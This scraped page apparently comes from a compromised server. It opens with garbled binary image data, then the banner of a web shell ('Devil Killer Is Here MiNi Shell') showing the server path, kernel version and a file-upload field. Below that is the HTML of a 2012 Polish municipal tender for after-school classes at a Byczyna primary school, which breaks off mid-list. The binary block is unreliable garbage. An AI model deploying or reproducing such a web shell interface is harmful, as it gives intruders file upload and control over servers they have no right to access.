JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120313/58515-N-2012.html

<p class="kh_header"><b>Byczyna: Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna, Etap I - PSP Byczyna</b><br>
<b>Numer ogłoszenia: 58515 - 2012; data zamieszczenia: 13.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Byczyna z siedzibą w Urzędzie Miejskim w Byczynie , Rynek 1, 46-220 Byczyna, woj. opolskie, tel. 77 413 41 50, faks 77 413 41 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.byczyna.pl, www.byczyna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna, Etap I - PSP Byczyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Prowadzenie zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego dla uczniów klas I-III szkół podstawowych na terenie Gminy Byczyna w ramach projektu pt. Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna. 

Zamawiający wymaga, aby kompleksowa realizacji każdej z części zamówienia przeprowadzana była przez osobę prowadzącą zajęcia (bądź przez Wykonawcę, który jest jednocześnie osobą prowadzącą zajęcia), czyli przez osobę wskazaną w Załączniku nr 5 - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia. Będą to w szczególności następujące czynności:
1)	Opracowania w oparciu o wytyczne przekazane przez Zamawiającego, w uzgodnieniu z Dyrektorem PSP w Byczynie:
- programu nauczania dla przydzielonej grupy uczniów (program nauczania może ulec zmianie i aktualizacji w zależności od wyników przeprowadzanych testów diagnostycznych i/lub zmiany siatki godzinowej PSP w Byczynie), 
- przeprowadzenia zajęć pozalekcyjnych na podstawie programu nauczania,
2)	Przekazania Zamawiającemu do akceptacji programu zajęć (zarówno pierwszego planu zajęć, jak zmian planu zajęć) - w terminie do 3 dni od dnia zawarcia Umowy,
3)	Monitorowanie udziału uczestników oraz prowadzenia dokumentacji zajęć, w szczególności:
-prowadzenia dziennika zajęć wraz z lista obecności - na każdych zajęciach,
-zebranie od uczniów deklaracji uczestnika - na pierwszych zajęciach,
-dokumentacji z przeprowadzonych testów diagnostycznych,
-karty obserwacji ucznia.
4)	Przeprowadzenia testów diagnostycznych (pierwszy test przed rozpoczęciem zajęć, następne po ukończeniu kolejnego semestru i roku szkolnego)
5)	Zapewnienia bezpieczeństwa uczniów podczas zajęć pozalekcyjnych,
6)	Oznaczenia wszelkiej dokumentacji związanej z realizacją Umowy, zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczenia Projektów w ramach Programu Operacyjnego Kapitał Ludzki.

Zamówienie składa się z  12 części, w tym: 
I)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu - dla dzieci z grupy ryzyka dyslekcji rozwojowej(zajęcia specjalistyczne), 
II)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu (zajęcia specjalistyczne), 
III)	zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (zajęcia specjalistyczne),
IV)	zajęcia z gimnastyki korekcyjnej (zajęcia specjalistyczne),
V)	zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy I  (zajęcia specjalistyczne)*,
VI)	zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy II  (zajęcia specjalistyczne)*,
VII)	zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy I  (zajęcia specjalistyczne), 
VIII)	zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy II, w tym uczniów z orzeczeniem o niepełnosprawności  (zajęcia specjalistyczne)*,
IX)	zajęcia kółka przyrodniczo - ekologicznego (zajęcia specjalistyczne),
X)	zajęcia taneczne (zajęcia rozwijające uzdolnienia),
XI)	zajęcia śpiewu (zajęcia rozwijające uzdolnienia),
XII)	zajęcia plastyczne (zajęcia rozwijające uzdolnienia).

* wzięto pod uwagę przynależność uczniów odpowiednio do klasy I lub II w roku szkolnym 2011/2012. Realizacja zajęć odbywać się będzie na podstawie programu nauczania opracowanego przez Wykonawcę, z uwzględnieniem higieny pracy uczniów, w uzgodnieniu z dyrektorem szkoły, na terenie której odbywać się będą zajęcia, w siatce godzin lekcyjnych PSP w Byczynie. Harmonogram zajęć została załączony do SIWZ - załącznik nr 7. Zamawiający przedstawia harmonogram zajęć na miesiące od marca do czerwca 2012 r. Harmonogram zajęć może ulec nieznacznym zmianom w przypadku np.: zmiany planu lekcji w PSP w Byczynie, w przypadku okoliczności, których na dzień dzisiejszy nie można przewidzieć. Nie ma możliwości przedstawienia harmonogramu zajęć za cały okres trwania projektu, ze względu choćby na fakt, że nie jest znany plan lekcji PSP w Byczynie na rok szkolny 2012/2013.

Wszystkie zajęcia odbywać się będą zarówno w godzinach przedpołudniowych (od 8.00) jak i popołudniowych (do 16.00 w wyjątkowych sytuacjach do 19.00), w siatce godzin lekcyjnych PSP w Byczynie.

Szczegółowy Opis przedmiotu 

Część I i II
Zajęcia specjalistyczne dla dzieci z trudnościami w pisaniu i czytaniu

Zajęcia są przeznaczone dla dzieci ze specyficznymi trudnościami w uczeniu się oraz zagrożonych dysleksją. Specyfika zajęć przewiduje udział rodziców w zajęciach w celu zapewnienia kompetentnej pomocy uczniowi nie tylko w szkole, ale i w domu ze względu na nieodzowną ciągłość ćwiczeń. Praca odbywać się będzie w oparciu o najskuteczniejsze metody edukacyjno- terapeutyczne. Oczekiwane efekty to zminimalizowanie trudności uczniów w nauce oraz podniesienie samooceny uczniów.
Ze względu na specyfikę zajęć od prowadzących wymagane jest wykształcenie wyższe pedagogiczne oraz doświadczenie w pracy z uczniem o specyficznych trudnościach w czytaniu i pisaniu, doświadczenie w edukacji wczesnoszkolnej oraz w pracy pedagogicznej z uczniem i jego rodzicem, a także znajomość metod terapeutycznych przewidzianych programem edukacyjno- terapeutycznym Ortograffiti, znajomość metody P. Dennisona, programu rozwijającego percepcję wzrokową M. Frostig, D. Horne; ćwiczeń przygotowujących M. Bogdanowicz i M. Drożyńskiej. 

Część III
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych

Celem zajęć jest wyrównywanie braków w wiadomościach i umiejętnościach matematycznych uczniów, dla których te braki są przyczyną niepowodzeń szkolnych. Specyfika zajęć oraz ich atrakcyjność (np. nauka przez zabawę) mają umożliwić niwelowanie trudności, trenować umiejętność skupienia się na zadaniu, zwiększać motywację do pokonywania trudności.  Ryzyko porażki na lekcji w klasie staje się (główny cel zajęć) znacznie mniejsze. Zajęcia muszą przewidywać: indywidualizację, rozwijanie zainteresowań, różnorodność wykonywanych zadań, wyzwalanie twórczej aktywności pozwoli uczniom lepiej funkcjonować w zespołach klasowych.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, doświadczenie w pracy w edukacji wczesnoszkolnej. Istotna jest znajomość zakwalifikowanych uczestników i bardzo dokładne zdiagnozowanie ich braków edukacyjnych. 

Część IV
Zajęcia z gimnastyki korekcyjnej 

W PSP im. J. Zamojskiego w Byczynie od czterech lat realizowany jest program przeciwdziałania wadom postawy u dzieci i młodzieży w województwie opolskim. Zajęcia wymagają ustawicznej pracy z uczniem, począwszy od zakwalifikowania go na zajęcia gimnastyki korekcyjnej, poprzez monitorowanie udziału i zaangażowania w ćwiczenia uczestników zajęć, a skończywszy na wyjazdach na specjalistyczne badania. Udział w zajęciach uczniów objętych programem Nowe szanse- edukacja w szkołach podstawowych Gminy Byczyna ma umożliwić aktywny udział 
w zajęciach gimnastyki korekcyjnej jeszcze większej grupy dzieci z  PSP Byczyna.  Efektem zajęć ma być nabycie przez uczestników nawyku prawidłowej postawy ciała oraz świadomość istotnej roli prawidłowej postawy dla zdrowia
i rozwoju. Niezbędny jest program nauczania dostosowany do korygowania wad postawy u dzieci i młodzieży.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne oraz specjalizacja z gimnastyki korekcyjnej, jak również doświadczenie w pracy z uczniami z wadami postawy.

Część V, VI, VII, VIII
Zajęcia korekcyjno - kompensacyjne

Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych.

Część IX
Zajęcia w ramach kółka przyrodniczo- ekologicznego

Na zajęcia kółka przyrodniczo- ekologicznego będą uczęszczali uczniowie chcący poszerzać swoje zainteresowania przyrodnicze. Zamawiający przewiduje, że większość zajęć  to zajęcia/ warsztaty, również w terenie. Ze względu na to, iż uczestnikami są najmłodsi uczniowie, zajęcia muszą mieć atrakcyjną formę, a metody i narzędzia muszą być dostosowane do możliwości percepcyjnych uczestników. Celem jest przygotowanie do działań ekologicznych oraz motywowanie do świadomego uczestniczenia w różnego rodzaju aktywności uczniowskiej ukierunkowanej na ochronę środowiska naturalnego, energii, wody, lasów.
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, doświadczenie w edukacji wczesnoszkolnej. Wymagane jest, aby w trakcie zajęć prowadzący zorganizował spotkania z instytucjami zdecydowanymi na współpracę- przyrodnicze, ekologiczne prelekcje, warsztaty, zajęcia w terenie. 

Część X
Zajęcia taneczne

Zajęcia taneczne mają za zadanie rozwijanie w uczestnikach  muzykalności, wrażliwości muzycznej, umiejętności tanecznych. Zajęcia taneczne mają dotyczyć w znacznej mierze nauki polskich tańców ludowych. Zajęcia dają ogromną szansę realizacji pasji, prezentowania się na forum szkoły, w środowisku lokalnym oraz na festiwalach, konkursach tanecznych. Uczestnicy mają możliwość integrowania się z grupą i wraz z nią aktywnego udziału w kulturze. Ze względu na to, iż zajęcia taneczne wymagają wielu ćwiczeń i prób, są alternatywną, aktywną forma spędzania wolnego czasu. Zwykle uwieńczoną sukcesem.
Od prowadzącego zajęcia wymagają wykształcenia wyższego pedagogicznego, doświadczenia w pracy twórczej z dziećmi i młodzieżą, dyspozycyjności i dużej ilości czasu poświęcanego na próby oraz wyjazdy. Zadaniem prowadzącego zajęcia będzie również określenie wymogów co do zakupu strojów ludowych odpowiadających swoim charakterem tańcom, których nauka będzie prowadzona w trakcie zajęć, z uwzględnieniem potrzeb szkoły. Prowadzący zajęcia musi legitymować się wykształceniem w zakresie:  pedagogika tańca.

Część XI
Zajęcia śpiewu 

Główny cel  zajęć to praca z uczniem uzdolnionym muzycznie i pragnącym rozwijać swoją pasję w tym kierunku. 
Zakres zajęć obejmie kształtowanie  głosu i umiejętność posługiwania się nim, rozwijanie słuchu muzycznego oraz pobudzanie wrażliwości intonacyjno-emisyjnej. Uzyskane efekty zajęć to również wyrobienie umiejętności artystycznego wykonywania pieśni chóralnych i solowych, nadawanie im indywidualnego wyrazu interpretacyjnego oraz nauka podstawowych ruchów dyrygenta.
Zajęcia będą polegały także na nauce gry na  instrumentach perkusyjnych, dętych i  klawiszowych.
Nauczyciel prowadzący powinien mieć kwalifikacje wyższe pedagogiczne z przygotowaniem do nauczania muzyki z elementami dyrygentury. Ze względu na wiek uczestników (uczniowie klas I- III) niezbędne są kwalifikacje do edukacji wczesnoszkolnej oraz doświadczenie w pracy z dziećmi.


Część XII
Zajęcia plastyczne

Zajęcia plastyczne w każdej szkole są jedną z najatrakcyjniejszych, ulubionych również przez najmłodszych uczniów, form zajęć pozalekcyjnych. W PSP im. J. Zamojskiego są one tradycyjnie ukierunkowane na rozwijanie talentu, umiejętności i zdolności artystycznych, ale też na pracę na rzecz szkoły- wystawy prac, dekorowanie hollu szkolnego, wykonywanie prac na kiermasze i akcje charytatywne. Taki jest również cel pracy z najmłodszymi w ramach realizowanego programu. Praca twórcza z najmłodszymi ma zostać uwieńczona wystawą propagującą zasadę równości. 
Od prowadzącego wymagane jest wykształcenie wyższe pedagogiczne, wykształcenie w kierunku plastyka, doświadczenie w pracy z najmłodszymi uczniami ze względu na konieczność  doboru odpowiednich do wieku i możliwości metod i narzędzi pracy.

Nr Części/Rodzaj zajęć/PSP Byczyna/Liczba Godz. w 2012 r./Liczba Godz. w 2013 r./Liczba uczniów;
I	/Dla dzieci z trudnościami w czytaniu i pisaniu - dla dzieci z grupy ryzyka dyslekcji	/42/	18	/4;
II	/Dla dzieci z trudnościami w czytaniu i pisaniu/	42/	18/	4;
III/	Dla dzieci z trudnościami matematycznymi/	42	/18	/5;
IV/	Zajęcia z gimnastyki korekcyjnej/	42/	18/	12;
V	/Zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy I/	42/	18	/3;
VI	/Zajęcia korekcyjno - kompensacyjne, zajęcia z terapii pedagogicznej dla uczniów klasy II/	42/	18/	3;
VII/	Zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy I	/42/	18/	3;
VIII/	Zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy II, w tym uczniów z orzeczeniem o niepełnosprawności/	42/	18/	3;
IX	/Zajęcia kółka przyrodniczo - ekologicznego	/30	/-	/10;
X	/Zajęcia taneczne	/42/	18	/12;
XI	/Zajęcia śpiewu	/42/	18	/12;
XII	/Zajęcia plastyczne/	42/	18/	12.

Realizacja zajęć rozliczana będzie godzinowo, przy czym pod pojęciem godzina należy rozumieć godzinę lekcyjną (45 minut).

Zajęcia odbywać się będą z wykorzystaniem pomocy edukacyjnych zakupionych w ramach przedmiotowego projektu, w pomieszczeniach zapewnionych przez szkołę, w której odbywać się będą zajęcia. 

Wykonawca za zgodą Zamawiającego może wyznaczyć inną osobę do realizacji przedmiotu umowy w zastępstwie tylko w wyjątkowych sytuacjach, w przypadku choroby nauczyciela wyznaczonego do prowadzenia zajęć lub innych obiektywnych przeszkód uniemożliwiających pełnienie przez niego obowiązków. Wskazana osoba powinna posiadać niezbędne kwalifikacje do wykonania przedmiotu umowy. W przypadku nagłej nieobecności Wykonawca ma obowiązek powiadomienia o zmianach w harmonogramie zajęć biuro projektu Zamawiającego.


Przedmiot zamówienia zakwalifikowano do CPV: 
80.00.00.00-4 - usługi edukacyjne i szkoleniowe 
80.10.00.00-5 - usługi szkolnictwa podstawowego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie 
 oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie 
 oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie 
 oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli wykonawca dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia dla każdej części zamówienia, na którą składa ofertę, posiadającą kwalifikacje do zajmowania stanowiska nauczyciela w szkole podstawowej określone w Rozporządzeniu Ministra Edukacji Narodowej 
z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji, wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50 poz. 400), 

a dodatkowo osoba zdolna do wykonania zamówienia posiada (dla poszczególnych części):

I	Dla dzieci z trudnościami w czytaniu i pisaniu - dla dzieci z grupy ryzyka dyslekcji rozwojowej	
-co najmniej 2 letnia praktykę w pracy z uczniami z trudnościami  w czytaniu i pisaniu,
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, 
-znajomość metod terapeutycznych przewidzianych programem edukacyjno- terapeutycznym Ortograffiti, 
-znajomość metody P. Dennisona, programu rozwijającego percepcję wzrokową M. Frostig, D. Horne; 
-znajomość ćwiczeń przygotowujących M. Bogdanowicz i M. Drożyńskiej, 
-jest członkiem Polskiego Towarzystwa Dyslekcji.

II	Dla dzieci z trudnościami w czytaniu i pisaniu	
-	co najmniej 2 letnia praktykę w pracy z uczniami z trudnościami w czytaniu i pisaniu,
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej.
-	znajomość metod terapeutycznych przewidzianych programem edukacyjno- terapeutycznym Ortograffiti, 
-	znajomość metody P. Dennisona, programu rozwijającego percepcję wzrokową M. Frostig, D. Horne; 
-znajomość ćwiczeń przygotowujących M. Bogdanowicz i M. Drożyńskiej.


III	Dla dzieci z trudnościami matematycznymi
	-	co najmniej 2 letnia praktykę w pracy z uczniami z trudnościami matematycznymi, 
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej.


IV	Zajęcia z gimnastyki korekcyjnej	
-	specjalizację z gimnastyki korekcyjnej,
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy i doświadczenie w pracy z dziećmi z wadami postawy.

V 	Zajęcia korekcyjno - kompensacyjne, zajęcia 
z terapii pedagogicznej dla uczniów klasy I
VI	Zajęcia korekcyjno - kompensacyjne, zajęcia 
z terapii pedagogicznej dla uczniów klasy II
VII	Zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy I
VIII	Zajęcia korekcyjno - kompensacyjne, zajęcia rewalidacyjne dla uczniów klasy II, w tym uczniów z orzeczeniem o niepełnosprawności
-	kwalifikacje w zakresie:
1/rewalidacji lub
2/	oligofrenopedagogiki lub 
3/	terapii pedagogicznej,
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela.


IX	Zajęcia kółka przyrodniczo - ekologicznego	
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej.



X	Zajęcia taneczne	
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 4 letnie doświadczenie w prowadzeniu zajęć tanecznych, 
-	wykształcenie kierunkowe (pedagogika tańca).



XI	Zajęcia śpiewu	
-	przygotowanie do nauczania muzyki z elementami dyrygentury
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 4 letnie doświadczenie w prowadzeniu zajęć muzycznych.


XII	Zajęcia plastyczne	
-	co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 4 letnie doświadczenie w prowadzeniu zajęć plastycznych, 
-	wykształcenie kierunkowe (plastyczne).
Ocena spełniania powyższego warunku prowadzona będzie na podstawie oświadczenia załączonego do oferty - wykaz osób, które będą uczestniczyć w wykonaniu zamówienia  /załącznik nr 5 do SIWZ/ zgodnie z formułą spełnia - nie spełnia. 
Uwaga: należy wypełnić właściwy załącznik w zależności od tego, dla której części składana jest oferta.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie 
 oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
